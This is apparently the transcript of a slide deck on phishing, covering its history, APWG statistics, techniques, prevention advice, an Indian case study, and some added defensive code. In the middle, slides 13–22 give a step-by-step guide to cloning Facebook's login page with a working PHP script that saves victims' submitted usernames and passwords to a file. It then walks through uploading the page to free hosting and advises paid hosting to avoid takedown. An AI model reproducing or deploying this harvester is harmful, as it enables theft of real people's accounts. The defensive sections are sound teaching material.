In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. A phishing message is typically a fraudulent e-mail that attempts to get you to divulge personal data that can then be used for illegitimate purposes.
2. Agenda
1:- INTRODUCTION, DEFINITION AND DESCRIPTION OF PHISHING
2:- HISTORY AND CURRENT STATUS OF PHISHING
3:- PHISHING TECHNIQUES
4:- HACKING FACEBOOK ACCOUNTS BY PHISHING – STEP BY STEP!
5:- DAMAGE CAUSED BY PHISHING AND ANTI-PHISHING
6:- HOW TO COMBAT PHISHING: WHAT TO DO? AND WHAT NOT TO DO?
7:- RECENT PHISHING ATTEMPTS, LEGAL RESPONSE AND CASE STUDY
3. DEFINITION AND DESCRIPTION
• Phishing is an attempt to acquire information such as usernames, passwords, credit card details, etc. of a person or organization illegally in an electronic communication.
• Phishing is committed so that the phisher may obtain sensitive and valuable information about a consumer, usually with the goal of fraud: obtaining the customer's bank and other financial information.
• Phishing is typically carried out by e-mail spoofing or instant messaging.
5. • In phishing the criminals create a fake website whose look and feel are identical to the legitimate one, on which the victims are told to enter their confidential details like username, password or account details.
• The phishing technique was described in detail in the year 1987 and was first used in the year 1995.
• Phishing is mainly committed so that the criminal may obtain sensitive and valuable information about the customer.
• Phishing makes high profit with little technological investment.
6. History
Phreaking + Fishing = Phishing
• Phreaking = making phone calls for free back in the 70's
• Fishing = using bait to lure the target
Phishing in 1995
Target: AOL users
Purpose: getting account passwords for free time
Threat level: low
Techniques: similar names (www.ao1.com for www.aol.com), social engineering
Phishing in 2001
Target: eBayers and major banks
Purpose: getting credit card numbers, accounts
Threat level: medium
Techniques: same as in 1995, keyloggers
Phishing in 2007
Target: PayPal, banks, eBay
Purpose: bank accounts
Threat level: high
Techniques: browser vulnerabilities, link obfuscation
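The 1995 trick above (www.ao1.com standing in for www.aol.com) is still the basis of lookalike-domain detection. The following is an added example written for this page, not code from the original slides: it folds visually confusable characters into a "skeleton" and compares each label against a constructed list of protected brands, also catching a brand name embedded in another domain and single-character typos.

```python
import re
from difflib import SequenceMatcher

# Brands to protect (constructed sample list, not drawn from the slides' statistics).
PROTECTED_DOMAINS = ["aol.com", "ebay.com", "paypal.com"]

# Characters that read as letters in many fonts; "ao1.com" relies on 1 looking like l.
CONFUSABLES = {"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "|": "l", "!": "i"}

def normalize(domain):
    """Lowercase, drop a leading 'www.' and any trailing dot; no visual folding yet."""
    return re.sub(r"^www\.", "", domain.lower().strip("."))

def skeleton(domain):
    """Fold visually similar spellings so that ao1, a0l, rn/m and vv/w collide with the real thing."""
    folded = normalize(domain).replace("rn", "m").replace("vv", "w").replace("-", "")
    return "".join(CONFUSABLES.get(ch, ch) for ch in folded)

def lookalike_of(domain, protected=PROTECTED_DOMAINS, threshold=0.8):
    """Return the protected brand that `domain` imitates, or None when it is the
    brand itself, one of the brand's own subdomains, or simply unrelated."""
    plain = normalize(domain)
    labels = skeleton(domain).split(".")[:-1]      # never compare against the TLD
    for brand in protected:
        if plain == brand or plain.endswith("." + brand):
            return None                             # genuine site or one of its own hosts
        brand_label = brand.split(".")[0]           # e.g. "paypal"
        for label in labels:
            # brand name reused as a label or glued to another word: ebay.com.x.net, paypal-secure.com
            if label.startswith(brand_label) or label.endswith(brand_label):
                return brand
            # one-character typo or transposition: payapl.com
            if SequenceMatcher(None, label, brand_label).ratio() >= threshold:
                return brand
    return None
```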
7. Current status of Phishing
• The APWG received 26,150 unique phishing reports.
• This total represents the second highest number of phishing reports that the APWG has received in a single month.
• The APWG detected 10,091 unique phishing websites worldwide.
• 148 separate corporate brands were “hijacked” (misused) in phishing schemes (compared to 84 in August 2005).
• The financial sector was the most heavily targeted for phishing schemes, constituting 92.6 percent of all phishing attacks.
8. • The APWG found 2,303 unique websites that hosted “keylogging” programs.
• The United States was the country hosting the largest percentage of phishing websites (27.7 percent, compared to 27.9 percent in August 2005), while Canada ranked ninth among countries hosting such websites (2.2 percent, compared to 2.21 percent in August 2005). China remains the second most frequent host of phishing websites (14 percent, compared to 12.15 percent in August 2005), and South Korea the third most frequent host of such sites (9.59 percent, compared to 9.6 percent in August 2005).
9. • A very recent and popular case of phishing is that Chinese phishers are targeting the Gmail accounts of high-ranking officials of the United States and South Korean governments and military, and of Chinese political activists.
10. Phishing Technique
Deceptive - Sending a deceptive email, in bulk, with a “call to action” that demands the recipient click on a link.
Malware-Based - Running malicious software on the user’s machine. Various forms of malware-based phishing are:
  Key Loggers & Screen Loggers
  Session Hijackers
  Web Trojans
  Data Theft
DNS-Based - Phishing that interferes with the integrity of the lookup process for a domain name. Forms of DNS-based phishing are:
  Hosts file poisoning
  Polluting the user’s DNS cache
  Proxy server compromise
11. Content-Injection – Inserting malicious content into a legitimate site.
Three primary types of content-injection phishing:
  Hackers can compromise a server through a security vulnerability and replace or augment the legitimate content with malicious content.
  Malicious content can be inserted into a site through a cross-site scripting vulnerability.
  Malicious actions can be performed on a site through a SQL injection vulnerability.
12. • Man-in-the-Middle Phishing - The phisher positions himself between the user and the legitimate site.
• Search Engine Phishing - Create web pages for fake products, get the pages indexed by search engines, and wait for users to enter their confidential information as part of an order, sign-up, or balance transfer.
13. Step To Hack Facebook
• Step 1: Go to http://www.facebook.com, right-click on the home page and select "view page source".
14. • Step 2: Look for something which looks like this:
15. • Step 3: Then change the action URL to login.php; now it will look similar to this.
Save it as index.html.
16. • Step 4: Open a notepad, paste the following code inside it and save it as login.php.
<?php
header('Location: http://www.facebook.com');
$handle = fopen("passwords.txt", "a");
foreach ($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Here, the victim will be redirected to http://www.facebook.com. You can change it to your desired location by editing the argument of the header function in the above PHP code.
17. • Step 5: Create another blank text file for storing the hacked usernames and passwords and name it passwords.txt.
Now you are done with the setup of the phishing page; all you need to do is host it somewhere on the internet so that it becomes available to your victim.
• Step 6: Go to some free hosting site like http://www.000webhost.com and sign up for free. You will be provided with 1.5GB of free space to host your web pages and a free domain. You will have to complete the email confirmation step to get your web page running.
18. • Step 7: Once you get your account activated, sign in and click Go to CPanel as shown below.
20. • Step 9: Now you will see a folder public_html in the web-based ftp client page; click on the folder and open it.
21. • Step 10: Click on Upload, select all the 3 files and finally click on the green tick to upload them as shown in the image below.
• Once you get your files uploaded you can check your page at your registered domain.
22. • The victim’s password will be automatically written into the passwords.txt file; just open the file to see the username and password!
• Congratulations, you are done creating your phishing page! If you have understood everything perfectly then you can use this technique to create phishing pages for other sites also.
• Note: Phishing pages at free hosting services will be deleted immediately once detected. So my advice is to use a paid hosting service or else host it on your own system.
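A defender-side counterpart to the cloned page built above, written as an added example (not code from the original slides): it parses an HTML page, finds forms containing a password field, and flags any whose action would send the credentials to a host other than the genuine login host, or over plain HTTP. The brand host www.bank.example and the free-host URL are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class _FormCollector(HTMLParser):
    """Record every <form>: its action resolved against the page URL, and whether it has a password box."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url, self.forms, self._cur = page_url, [], None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            # A relative or missing action resolves to the host serving the page, which is what
            # makes the copied page's "login.php" land on the free host rather than the real site.
            self._cur = {"action": urljoin(self.page_url, a.get("action", "")), "password": False}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None and a.get("type", "text").lower() == "password":
            self._cur["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None

def credential_leaks(page_url, html, genuine_hosts):
    """Actions of password forms that would send credentials anywhere except a genuine host over HTTPS."""
    parser = _FormCollector(page_url)
    parser.feed(html)
    flagged = []
    for form in parser.forms:
        if not form["password"]:
            continue
        dest = urlparse(form["action"])
        if dest.scheme != "https" or (dest.hostname or "").lower() not in genuine_hosts:
            flagged.append(form["action"])
    return flagged

# Constructed sample: a copied login page on free hosting, with the form action rewritten to login.php.
CLONED_PAGE = """<html><body>
<form method="post" action="login.php">
  <input name="email" type="text"><input name="pass" type="password">
</form>
<form method="get" action="https://www.bank.example/search"><input name="q"></form>
</body></html>"""

# Constructed sample: the same markup as served by the genuine site.
GENUINE_PAGE = CLONED_PAGE.replace('action="login.php"', 'action="https://www.bank.example/login"')

if __name__ == "__main__":
    print(credential_leaks("http://free-host.example/bank/index.html", CLONED_PAGE, {"www.bank.example"}))
    print(credential_leaks("https://www.bank.example/", GENUINE_PAGE, {"www.bank.example"}))
```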
23. DAMAGE CAUSED BY PHISHING
• The impact of phishing is both domestic and international, and concerns the commercial and financial sectors.
• Direct Financial Loss. The phishing technique is mainly used to cause financial loss to a person or an organization. Consumers and businesses may lose from a few hundred dollars to millions of dollars.
• Erosion of Public Trust in the Internet. Phishing also decreases the public’s trust in the Internet.
25. • A survey found that 9 out of 10 American adult Internet users have made changes to their Internet habits because of the threat of identity theft.
• 30 percent say that they reduced their overall usage.
• 25 percent say they have stopped shopping online, while 29 percent of those that still shop online say they have decreased the frequency of their purchases.
26. Anti-Phishing
Anti-Phishing Working Group (APWG)
The APWG has over 2,300 members from over 1,500 companies & agencies worldwide. Member companies include leading security companies such as Symantec, McAfee and VeriSign. Financial industry members include the ING Group, VISA, Mastercard and the American Bankers Association.
27. Educate application users
Think before you open
Never click on the links in an email, message boards or mailing lists
Never submit credentials on forms embedded in emails
Inspect the address bar and SSL certificate
Never open suspicious emails
Ensure that the web browser has the latest security patch applied
Install latest anti-virus packages
Destroy any hard copy of sensitive information
Verify the accounts and transactions regularly
Report the scam via phone or email.
28. Formulate and enforce Best practices
Authorization controls and access privileges for systems, databases and applications.
Access to any information should be based on the need-to-know principle.
Segregation of duties.
Media should be disposed of only after erasing sensitive information.
Reinforce application development / maintenance processes:
1. Web page personalization
Using two pages to authenticate the users.
Using client-side persistent cookies.
2. Content Validation
Never inherently trust the submitted data.
Never present the submitted data back to an application user without sanitizing it.
Always sanitize data before processing or storing.
Check the HTTP referrer header.
29. 3. Session Handling
Make session identifiers long, complicated and difficult to guess.
Set expiry time limits for SessionIDs, and check them on every client request.
The application should be capable of revoking active SessionIDs and must not recycle the same SessionID.
Any attempt to use an invalid SessionID should be redirected to the login page.
Never accept session information within a URL.
Protect the session via SSL.
Session data should be submitted as a POST.
After authenticating, a new SessionID should be used (HTTP & HTTPS).
Never let the users choose the SessionID.
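An added example (not the slides' own code) of a session store that follows the rules just listed: IDs from the OS CSPRNG that the client never chooses, expiry checked on every request, revocation without reuse, and a fresh ID issued after authentication. The TTL, the injectable clock and the in-memory dictionary are assumptions made for the demo.

```python
import secrets
import time

class SessionStore:
    """In-memory session store applying the rules listed above (an assumed design for the demo)."""

    def __init__(self, ttl_seconds=900, clock=time.monotonic):
        self.ttl = ttl_seconds
        self.clock = clock           # injectable so expiry can be tested without sleeping
        self._sessions = {}          # sid -> {"user": str | None, "expires": float}
        self._retired = set()        # IDs that must never be accepted again nor reissued

    def _new_id(self):
        """256 random bits from the OS CSPRNG: long, complicated, not guessable; never recycled."""
        while True:
            sid = secrets.token_urlsafe(32)
            if sid not in self._sessions and sid not in self._retired:
                return sid

    def create(self):
        """Pre-login session. The server chooses the ID; a client-supplied one is never honoured."""
        sid = self._new_id()
        self._sessions[sid] = {"user": None, "expires": self.clock() + self.ttl}
        return sid

    def lookup(self, sid):
        """Checked on every request; unknown, revoked or expired IDs yield None (caller redirects to login)."""
        record = self._sessions.get(sid)
        if record is None:
            return None
        if self.clock() >= record["expires"]:
            self.revoke(sid)
            return None
        record["expires"] = self.clock() + self.ttl     # sliding expiry window
        return record

    def authenticate(self, pre_login_sid, user):
        """After login, retire the old ID and issue a new one, so an ID seen before login is worthless after."""
        if self.lookup(pre_login_sid) is None:
            return None
        self.revoke(pre_login_sid)
        sid = self._new_id()
        self._sessions[sid] = {"user": user, "expires": self.clock() + self.ttl}
        return sid

    def revoke(self, sid):
        """Server-side revocation: drop the record and remember the ID so it is never reused."""
        self._sessions.pop(sid, None)
        self._retired.add(sid)
```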
4. Image Regulation
Image Cycling
Session-bound images
30. 5. URL Qualification
Do not reference the redirection URL in the browser’s URL.
Always maintain a valid approved list of redirection URLs.
Never allow customers to supply their own URLs.
Never allow IP addresses to be used in URL information.
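An added example (not from the original slides) of URL qualification for a post-login redirect parameter: it admits only same-site paths or HTTPS URLs on a constructed approved-host list, and rejects IP literals, protocol-relative URLs, backslash tricks and userinfo tricks.

```python
import ipaddress
from urllib.parse import urlparse

# Hosts a login flow may hand the browser to after authentication (constructed allow-list).
APPROVED_HOSTS = {"www.bank.example", "secure.bank.example"}

def is_ip_literal(host):
    """True for 192.0.2.10, [2001:db8::1] and similar, which the rules above forbid in URLs."""
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False

def safe_redirect_target(requested, default="/", approved=APPROVED_HOSTS):
    """Qualify a redirect parameter: return it only if it is a plain same-site path
    or an HTTPS URL on an approved host; anything else falls back to `default`."""
    if not requested:
        return default
    parts = urlparse(requested)
    if parts.scheme == "" and parts.netloc == "":
        # Relative path. Reject "//host" (protocol-relative) and backslashes, which some
        # browsers turn into a host separator.
        if requested.startswith("/") and not requested.startswith("//") and "\\" not in requested:
            return requested
        return default
    if parts.scheme != "https":            # blocks http:, javascript:, data: and scheme-less "//host"
        return default
    if parts.username or parts.password:   # "https://www.bank.example@evil.example/" style
        return default
    host = (parts.hostname or "").lower()
    if is_ip_literal(host) or host not in approved:
        return default
    return requested
```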
6. Authentication Process
Ensure that a 2-phase login process is in place
Personalize the content
Design a strong token-based authentication
7. Transaction non-repudiation
To ensure authenticity and integrity of the transaction
31. PREVENTION TO BE TAKEN TO AVOID PHISHING
1. Prevention: What to Do
• Protect your computer with anti-virus software, spyware filters, e-mail filters, and firewall programs, and make sure that they are regularly updated.
• Ensure that your Internet browser is up to date and security patches are applied.
• Avoid responding to any unknown email or giving your financial information in reply to such mail.
32. • Unless the e-mail is digitally signed, it could also be fake.
• Phishers typically ask for information such as usernames, passwords, credit card numbers, social security numbers, etc.
• Phisher e-mails are typically not personalized, while valid messages from your bank or e-commerce company are generally personalized.
• Always ensure that you're using a secure website when submitting credit card or other sensitive information via your Web browser.
33. • To make sure you're on a secure Web server, check the beginning of the Web address in your browser's address bar: it should be "https://" rather than just "http://".
• Regularly log into your online accounts. Don't leave them unchecked for a long period of time.
• Regularly check your bank, credit and debit card statements to ensure that all transactions are legitimate.
• If anything is suspicious, contact your bank and all card issuers.
35. 2. Prevention: What Not to Do
• Don't assume that you can correctly identify a website as legitimate just by looking at it.
• Don’t use the links in an e-mail to get to any web page if you think that the message might not be authentic; log onto the website directly by typing the Web address into your browser.
• Avoid filling out forms in e-mail messages that ask for personal financial information.
36. • You should only communicate information such as credit card numbers or account information via a secure website or the telephone.
37. What does all the above imply?
It is better to be safer now than feel sorry later.
38. Case study
Case - fraud done by Mumbai mafia in IT city
City - Bangalore
State - Karnataka
Background
• The cyber crime police of Bangalore, after a two-year investigation, have proved that the Mumbai mafia is phishing the IT city.
• They have arrested three persons in connection with 3 different incidents.
• A CID official of SP’s rank said that this is a dangerous trend.
39. The cyber crime police station (CCPS) registered around 100 such phishing cases in 2009, but it’s difficult for them to trace every case as the fraudsters use benami bank accounts to do all this.
In this case the cyber crime police arrested 3 persons, all from Mumbai, who are connected with this case.
• The police said that all the arrested persons are graduates and have good knowledge of computers.
40. Investigation
• The cyber crime police arrested one Abdul Khan from Mumbai.
• The arrested person had transferred Rs 1 lakh (Rs 50,000, twice) from the ICICI account of one IT professional, Abhishek Malvia, a native of Itarsi, Madhya Pradesh.
41. Conclusion
• Phishing is a form of criminal conduct that poses increasing threats to consumers, financial institutions, and commercial enterprises in Canada, the United States, and other countries. Because phishing shows no sign of abating, and indeed is likely to continue in newer and more sophisticated forms, law enforcement, other government agencies, and the private sector in both countries will need to cooperate more closely than ever in their efforts to combat phishing, through improved public education, prevention, authentication, and binational and national enforcement efforts.